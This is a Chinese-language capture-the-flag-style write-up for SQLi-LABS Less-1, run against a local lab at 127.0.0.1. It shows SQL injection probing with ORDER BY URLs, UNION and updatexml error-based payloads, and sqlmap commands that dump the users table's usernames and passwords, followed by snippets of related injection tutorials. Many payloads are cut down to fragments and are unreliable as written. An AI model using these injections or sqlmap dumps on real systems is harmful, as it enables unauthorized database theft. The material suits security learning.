SQLi-LABS 第一關 SQL注入總結

阿新 • • 發佈：2021-01-11

SQLi-LABS 第一關 SQL注入總結

關卡簡介

關卡提示：GET-Error based- Single quotes-String

注入位置：GET

注入型別：子符串型（單引號閉合漏洞）

注入方法

前期測試

url 輸入

頁面無變化，排除數字型注入

url 輸入

有報錯回顯，可能是字串型

url 輸入

兩次頁面不一樣，確定是字串型

union聯合查詢注入

由於有顯示資料庫內容的欄位區域，還有有報錯回顯示, 因此可用此方法

爆列

http://127.0.0.1/Less-1/?id=1%27%20order%20by%201--+
http://127.0.0.1/Less-1/?id=1%27%20order%20by%202--+
http://127.0.0.1/Less-1/?id=1%27%20order%20by%203--+

試過均正常顯示id=1時的頁面，當報錯，說明 當前資料表有3列

爆出位置

構造注入 payload )--+

爆出資料庫版本

構造注入 payload )--+

爆出資料庫資訊 （第一條）

構造注入 payload )--+

爆出資料庫資訊 （所有）

構造注入 payload )--+

爆出當前庫的所有表

構造注入 payload )--+

爆出使用者表users的所有列名

構造注入 payload )--+

爆出使用者表users的所有資訊

報錯注入

由於有報錯回顯示, 因此可用此方法

這裡使用 updatexml 函式報錯方式

爆出資料庫版本 構造注入 payload ),0x7e),1)--+
爆出當前資料庫名 構造注入 payload ),0x7e),1)--+
爆出當前資料庫的所有表 構造注入 payload ),0x7e),1)--+
爆出當users表的所有列 構造注入 payload ),0x7e),1)--+
爆出當users表的所有資訊 構造注入 payload ),0x7e),1)--+

updatexml 函式報錯最多顯示32字元，可以用 limit 取資料，這裡不再演示

利用sqlmap注入

傻瓜式注入

爆出所有庫 終端執行 sqlmap -u --dbs
爆出當前資料庫所有表 終端執行 sqlmap -u -D security --tables
爆出users表中所有列 終端執行 sqlmap -u -D security -T users --columns
爆出users表所有資訊 終端執行 sqlmap -u -D security -T users -C username,password --dump

SQLi-LABS 第一關 SQL注入總結

SQLi-LABS 第一關 SQL注入總結關卡簡介關卡提示：GET-Error based- Single quotes-String 注入位置：GET

sqli-labs第一關:基於錯誤的GET單引號字元型注入

點進去題目：提示我們輸入題目id，第一題，所以我們輸入?id=1，回車即可。如圖:首先可以判斷這裡接受的是一個GET請求，先在1後面加一個’ 發現報錯，說明這裡沒有過濾掉引號，所以這裡是一個注入點 SQL注入

Sqli-labs 第2關 SQL注入 Writeup

Sqli-labs 第2關 SQL注入 Writeup 關卡簡介關卡提示：GET-Error based - Intiger based 注入位置：GET

Sqli-labs 第3關 SQL注入 Writeup

Sqli-labs 第3關 SQL注入 Writeup 關卡簡介關卡提示：GET -Error based- Single quotes with twist- string

sqli-labs闖關筆記-less2-數字型注入

開啟Less-2中index.php檔案，在第32行$sql=\"SELECT * FROM users WHERE id=\'$id\' LIMIT 0,1\";後面新增如下兩行：

sqli-labs闖關筆記-less38-53-堆疊注入

Stacked injections:堆疊注入。從名詞的含義就可以看到應該是一堆sql語句（多條）一起執行。而在真實的運用中也是這樣的，我們知道在mysql中，主要是命令列中，每一條語句結尾加 ; 表示語句結束。這樣我們就想到了是

Sqli-Labs Less12：POST注入

開啟bp抓包傳送至Repeater，新增 \\ 進行測試根據報錯：222\") 猜測查詢語句： select uname,passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)

sql注入總結

sql注入定義就是通過把sql命令插入到web表單提交或輸入域名或頁面請求的查詢字串，最終達到欺騙伺服器執行的sql命令的目的。

sqli-labs 20-22 --cookie注入

異常處理一開始開啟這個題目的時候找不到cookie... 登入成功就是沒有cookie cookie注入沒有cookie...

sql注入總結筆記

文章目錄滲透千萬條，安全第一條什麼是SQLi SQLi危害 SQLi分類如何發現SQLi？ SQLi的利用步驟？

sql-labs-less32/less33|sql注入

前言：由於less29-less31關需要使用JspStudy，但是官網的版本不支援Windows10環境（是我太菜，之前在XP虛擬機器搭建DVWA環境就搞不好），所以直接跳過了。本關為sql-labs系列less32和less33，此係列持續更

sqli-labs less38-53(堆疊注入 order by之後相關注入)

堆疊注入 less-38 less-39 less-40 less-41 less-42 less-43 less-44 less-45 考察order by相關注入 less-46

[Web安全]SQL注入總結(一)基礎篇

[Web安全]SQL注入總結(一)基礎篇搞不懂17周了，居然還有很多課要上，sql注入有點多，所以分開來寫，先水一篇

Web安全之SQL注入總結

本文會介紹POST注入、Head注入、報錯注入、盲注、cookie注入、寬位元組注入、堆疊注入、偏移注入、DNS注入、Access、Mssql、Oracle注入原理和手法。

sqli-labs闖關(11-20)

sqli-labs闖關(11-20) less-11 1、11-20關都為post傳遞，我們可以使用burp抓包來修改post提交的資料。

sqli-labs闖關筆記-目錄

下面是sqli-labs安裝程式中給出的結構。從介面上可以看出此專案共分成四個部分，如下圖：

sqli-labs闖關筆記-less1-20---介面報錯分析

less-1——基於單引號的字元型注入 SELECT * FROM users WHERE id=\'1\'\' LIMIT 0,1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right sy

sqli-labs闖關筆記-less25-less25a-雙寫繞WAF

less25 1. http://localhost:8001/sqli-labs/less-25/?id=1顯示正常2. http://localhost:8001/sqli-labs/less-25/?id=1\' 此時報錯，說明存在漏洞3. http://localhost:8001/sqli-labs/less-25/?id=1\' order by 3 -

sqli-labs學習sql注入

sqli-labs的安裝和配置下載sqli-labs和phpstudy(注意PHP study版本不能高於8.0，不然容易出錯，本人就是PHP study版本高了，一直出錯)

關於昨天sql注入第一關的一些知識補充

0x00 sql注入是怎麼回事呢 sql注入是怎麼回事呢？sql相信大家都很熟悉，但是sql注入是怎麼回事呢，下面就讓小編帶大家一起了解吧。

SQLi-LABS 第一關 SQL注入 總結

SQLi-LABS 第一關 SQL注入 總結

關卡簡介

注入方法

前期測試

union聯合查詢注入

報錯注入

利用sqlmap注入

相關推薦

SQLi-LABS 第一關 SQL注入總結

SQLi-LABS 第一關 SQL注入總結